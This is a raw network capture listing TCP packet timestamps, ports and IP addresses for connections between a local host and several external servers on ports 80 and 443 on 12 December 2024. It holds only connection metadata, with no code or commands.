Dec 12, 2024 16:48:27.805685997 CET	49903	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:27.805705070 CET	443	49903	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:27.806008101 CET	443	49903	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:27.806071043 CET	49903	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:27.806384087 CET	49903	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:27.807288885 CET	49884	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:27.807671070 CET	49904	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:27.847330093 CET	443	49903	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:27.855043888 CET	443	49900	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:27.855103016 CET	49900	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:27.855113983 CET	443	49900	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:27.855153084 CET	49900	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:27.855788946 CET	49900	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:27.855806112 CET	443	49900	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:27.871795893 CET	49908	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:27.871849060 CET	443	49908	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:27.872136116 CET	49908	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:27.872136116 CET	49908	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:27.872190952 CET	443	49908	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:27.927594900 CET	80	49904	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:27.927632093 CET	80	49884	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:27.927712917 CET	49884	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:27.927742958 CET	49904	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:27.928045034 CET	49904	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:28.047954082 CET	80	49904	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:28.201164007 CET	49909	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:28.201198101 CET	443	49909	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:28.201267004 CET	49909	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:28.213494062 CET	49909	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:28.213531971 CET	443	49909	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:28.329168081 CET	443	49903	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:28.329236984 CET	49903	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:28.329246044 CET	443	49903	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:28.329257011 CET	443	49903	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:28.329360008 CET	49903	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:28.329989910 CET	49903	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:28.330005884 CET	443	49903	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:29.241158009 CET	443	49908	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:29.241429090 CET	49908	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:29.244755983 CET	49908	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:29.244776964 CET	443	49908	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:29.245074034 CET	443	49908	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:29.245165110 CET	49908	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:29.245491982 CET	49908	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:29.278799057 CET	80	49904	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:29.278883934 CET	49904	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:29.280334949 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:29.280632019 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:29.287341118 CET	443	49908	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:29.377290964 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.377398014 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.388259888 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.388345003 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.400382042 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:29.400398970 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:29.400471926 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:29.400496006 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:29.400707960 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:29.427984953 CET	443	49909	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:29.428054094 CET	49909	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:29.435353041 CET	49909	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:29.435369968 CET	443	49909	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:29.438337088 CET	443	49909	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:29.438441992 CET	49909	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:29.441504955 CET	49909	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:29.487334013 CET	443	49909	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:29.497323990 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.497395039 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.497416019 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.497457981 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.501360893 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.501422882 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.520493031 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:29.568941116 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.571631908 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.572913885 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.572976112 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.572982073 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.573015928 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.580950975 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.583619118 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.583626032 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.583663940 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.587997913 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.591635942 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.595854044 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.599647045 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.599653006 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.599692106 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.605418921 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.605463028 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.607120037 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.607171059 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.614598036 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.614655018 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.620942116 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.621007919 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.624160051 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.627610922 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.634438992 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.635668993 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.636178017 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.636256933 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.650352001 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.651623011 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.653439045 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.653496981 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.664561033 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.667603970 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.667654991 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.667711020 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.678116083 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.679620981 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.681332111 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.681384087 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.689080000 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.691617966 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.691625118 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.691664934 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.702780962 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.703203917 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.727999926 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.731663942 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.731674910 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.731714010 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.760776043 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.760870934 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.760899067 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.760955095 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.762955904 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.763051033 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.767296076 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.770734072 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.770812988 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.770833969 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.770872116 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.770915985 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.770956993 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.777282953 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.777442932 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.777515888 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.777538061 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.777576923 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.782505035 CET	443	49908	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:29.782584906 CET	443	49908	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:29.782701969 CET	49908	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:29.788278103 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.789697886 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.789711952 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.789771080 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.791248083 CET	49908	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:29.791265965 CET	443	49908	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:29.798979044 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.799344063 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.799362898 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.799403906 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.809108973 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.811503887 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.811512947 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.811564922 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.819111109 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.819629908 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.819638968 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.819688082 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.829456091 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.831619024 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.831630945 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.831676006 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.839693069 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.843628883 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.843641043 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.843686104 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.849706888 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.855631113 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.855642080 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.855684996 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.859582901 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.861712933 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.861720085 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.861761093 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.868969917 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.869029045 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.869144917 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.869199038 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.880820990 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.883625031 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.883634090 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.883673906 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.888350010 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.889080048 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.889089108 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.889127016 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.891380072 CET	443	49909	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:29.891477108 CET	443	49909	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:29.891535997 CET	49909	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:29.896105051 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.897459030 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.897530079 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.897541046 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.897578955 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.904470921 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.907624960 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.907632113 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.907671928 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.912981987 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.915635109 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.915642023 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.915683031 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.919179916 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.919236898 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.920556068 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.921715975 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.925580978 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.931540966 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.931570053 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.933067083 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.933120966 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.933137894 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.933175087 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.933618069 CET	49909	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:29.933645964 CET	443	49909	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:29.938014030 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.939623117 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.939646006 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.939686060 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.944252014 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.945771933 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.952908039 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.954243898 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.954350948 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.954377890 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.954423904 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.956060886 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.957803011 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.957828045 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.957868099 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.960838079 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.961512089 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.962131977 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.963181973 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.966176033 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.969806910 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.969832897 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.969882965 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.971338034 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.971394062 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.972012043 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.972054958 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.976445913 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.977958918 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.977966070 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.977993965 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.981654882 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.981808901 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.981815100 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.981858015 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.986884117 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.991638899 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.991648912 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.991705894 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.991784096 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.991827965 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.991970062 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.992011070 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.997071981 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.999614954 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:29.999620914 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:29.999663115 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.001993895 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.002058983 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.002159119 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.002203941 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.006885052 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.011501074 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.011518002 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.011564970 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.011970043 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.012015104 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.012530088 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.012581110 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.016769886 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.016843081 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.016854048 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.016895056 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.021370888 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.021425009 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.021527052 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.021589994 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.026451111 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.026511908 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.026520014 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.026601076 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.026946068 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.026997089 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.027007103 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.027040958 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.033868074 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:30.033894062 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:30.089102030 CET	49916	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:30.089155912 CET	443	49916	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:30.089220047 CET	49916	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:30.089602947 CET	49916	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:30.089618921 CET	443	49916	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:30.208100080 CET	49917	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:30.208157063 CET	443	49917	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:30.208225012 CET	49917	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:30.208440065 CET	49917	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:30.208457947 CET	443	49917	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:30.727490902 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.727545977 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.727561951 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.727586985 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.727631092 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.727699041 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.727713108 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.727725983 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.727735043 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.727741003 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.727752924 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.727756023 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.727766991 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.727785110 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.727829933 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.727834940 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.727848053 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.727868080 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.727885962 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.848084927 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.848112106 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.848140001 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.848185062 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.852200031 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.852250099 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.919739008 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.919775963 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.919804096 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.919832945 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.923855066 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:30.923911095 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:30.923952103 CET	80	49912	31.41.244.11	192.168.2.10
